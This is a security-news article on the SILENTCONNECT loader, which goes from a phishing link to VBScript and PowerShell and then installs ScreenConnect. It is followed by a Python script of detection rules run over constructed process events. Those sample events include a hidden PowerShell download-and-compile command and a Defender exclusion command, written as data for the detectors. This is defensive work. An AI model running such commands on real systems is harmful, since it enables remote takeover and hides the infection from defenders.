Malware - SILENTCONNECT Deploys ScreenConnect via VBScript
In short, SILENTCONNECT is a stealthy malware loader that tricks users into installing malicious software on their computers.
SILENTCONNECT malware is stealthily targeting Windows machines, using VBScript and PowerShell to deploy ScreenConnect. This poses a significant risk to corporate security. Organizations must enhance their defenses to combat this sophisticated threat.
What Happened
SILENTCONNECT is a newly discovered malware loader that has been targeting Windows machines since March 2025. This multi-stage malware employs VBScript and PowerShell to install the remote monitoring tool, ScreenConnect, on compromised systems. Once installed, ScreenConnect allows attackers to gain full control over the infected machines, posing a serious threat to corporate environments worldwide.
The infection process begins with a phishing email that appears to contain a legitimate invitation or proposal. When the victim clicks on the link, they are redirected to a Cloudflare CAPTCHA page. After verifying they are human, a VBScript file named E-INVITE.vbs is automatically downloaded. The attackers use convincing filenames like Proposal-03-2026.vbs to lower the victim's defenses before executing the malware.
Who's Being Targeted
Organizations across various sectors are at risk from this sophisticated attack. The use of trusted platforms like Cloudflare and Google Drive to host malicious files makes detection difficult for many security systems. Researchers from Elastic Security Labs identified this campaign after observing multiple alerts triggered by the malware's behavior in early March 2026.
The malware's clever use of living-off-the-land techniques allows it to blend into normal Windows activity, making it challenging for security tools to spot. By disguising its VBScript payload as a children's story, it further deceives victims into executing the malware.
Signs of Infection
Once the SILENTCONNECT loader is active, it employs various evasion techniques to avoid detection. After a brief sleep period, it uses NtAllocateVirtualMemory to allocate executable memory and copies a shellcode stub into that region. This shellcode retrieves the Process Environment Block (PEB) address, allowing the malware to operate at a low system level while bypassing common monitoring tools.
The malware performs PEB masquerading by overwriting its module information to appear as a harmless Windows utility. This technique helps it evade detection by endpoint detection and response (EDR) systems, which often rely on PEB data to identify suspicious processes. The loader also executes a User Account Control (UAC) bypass and adds an exclusion for Microsoft Defender to further conceal its activities.
How to Protect Yourself
Organizations should take proactive measures to defend against SILENTCONNECT and similar threats. Regular audits for unauthorized remote monitoring tool installations are crucial. Monitoring outbound traffic for connections to unknown ScreenConnect servers can also help identify compromised systems.
Security teams should be vigilant about PowerShell commands that combine Add-Type with remote downloads. Alerts should be set for VBScript files fetched from the internet and any unexpected changes to Microsoft Defender exclusions. Tracking NtAllocateVirtualMemory calls from .NET processes can also aid in detecting this threat before it leads to a full compromise.
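As an added example, not taken from the original article or from Elastic Security Labs, the Python script below turns the monitoring advice above into a handful of detection rules and runs them over constructed process-creation events: a script host launching a .vbs from a user-writable folder, PowerShell that combines Add-Type with a download primitive (and PowerShell spawned by a script host, matching the VBScript-to-PowerShell chain described earlier), an Add-MpPreference exclusion change, and a ScreenConnect client whose instance name is not on an approval list. The sample events, the approved instance name and the Google Drive id are placeholders, not indicators from the campaign.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (not real telemetry). Each line is
# "image|parent image|command line", the way a Sysmon Event ID 1 record might be
# flattened by a log shipper. User names, the Google Drive id and the
# ScreenConnect instance names are placeholders.
SAMPLE_EVENTS = [
    "wscript.exe|explorer.exe|wscript.exe C:\\Users\\jdoe\\Downloads\\E-INVITE.vbs",
    "powershell.exe|wscript.exe|powershell -nop -w hidden -c Add-Type -TypeDefinition $src; "
    "(New-Object Net.WebClient).DownloadString('https://drive.google.com/uc?id=PLACEHOLDER')",
    "powershell.exe|powershell.exe|powershell -c Add-MpPreference -ExclusionPath 'C:\\Users\\jdoe\\AppData\\Local\\Temp'",
    "ScreenConnect.ClientService.exe|services.exe|\"C:\\Program Files (x86)\\ScreenConnect Client (abc123)\\ScreenConnect.ClientService.exe\"",
    "powershell.exe|explorer.exe|powershell -c Get-Process | Sort-Object CPU",
    "notepad.exe|explorer.exe|notepad.exe C:\\Users\\jdoe\\notes.txt",
]

# Assumed allow-list of ScreenConnect instances the organisation actually runs
# (the instance name is the parenthesised suffix of the client install folder).
APPROVED_SCREENCONNECT_INSTANCES = {"corp-helpdesk"}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# A .vbs under Downloads, Temp or AppData is a cheap stand-in for "fetched from
# the internet"; in production the Zone.Identifier (Mark of the Web) stream or
# the browser download event is the stronger signal.
USER_WRITABLE_VBS = re.compile(r"(?i)(downloads|temp|appdata)[\\/][^|]*?\.vbs\b")
ADD_TYPE = re.compile(r"(?i)\badd-type\b")
DOWNLOAD_PRIMITIVE = re.compile(
    r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"invoke-restmethod|\birm\b|net\.webclient|start-bitstransfer)"
)
DEFENDER_EXCLUSION = re.compile(r"(?i)\badd-mppreference\b.*-exclusion")
SC_INSTANCE = re.compile(r"(?i)screenconnect client \(([^)]+)\)")


@dataclass
class Finding:
    rule: str
    image: str
    command_line: str


def parse_event(line: str):
    """Split a flattened event into (image, parent image, command line).
    maxsplit=2 keeps any '|' characters inside the command line intact."""
    image, parent, cmd = line.split("|", 2)
    return image.strip(), parent.strip(), cmd.strip()


def evaluate(line: str) -> list:
    """Return the names of every rule the event triggers (empty list if none)."""
    image, parent, cmd = parse_event(line)
    img, par = image.lower(), parent.lower()
    hits = []
    # Rule 1: script host executing a .vbs from a user-writable location.
    if img in SCRIPT_HOSTS and USER_WRITABLE_VBS.search(cmd):
        hits.append("vbs_from_user_writable_path")
    if "powershell" in img:
        # Rule 2: Add-Type (in-memory compilation) combined with a download.
        if ADD_TYPE.search(cmd) and DOWNLOAD_PRIMITIVE.search(cmd):
            hits.append("powershell_addtype_download")
        # Rule 3: PowerShell whose parent is a script host (VBScript -> PowerShell).
        if par in SCRIPT_HOSTS:
            hits.append("powershell_spawned_by_script_host")
    # Rule 4: any command line that adds a Microsoft Defender exclusion.
    if DEFENDER_EXCLUSION.search(cmd):
        hits.append("defender_exclusion_added")
    # Rule 5: ScreenConnect client not belonging to an approved instance.
    if "screenconnect" in img:
        m = SC_INSTANCE.search(cmd)
        if not m or m.group(1).lower() not in APPROVED_SCREENCONNECT_INSTANCES:
            hits.append("unapproved_screenconnect_client")
    return hits


def scan(events) -> list:
    """Run every rule over every event and collect the findings in order."""
    findings = []
    for line in events:
        image, _, cmd = parse_event(line)
        for rule in evaluate(line):
            findings.append(Finding(rule, image, cmd))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.image}: {f.command_line[:80]}")
```

The rules are deliberately narrow so they fire on the chain the article describes without drowning analysts in ordinary PowerShell use (the Get-Process event is left alone). The one item from the advice that this script cannot cover is NtAllocateVirtualMemory calls from .NET processes: that needs API-level telemetry from an EDR or ETW provider rather than process-creation logs.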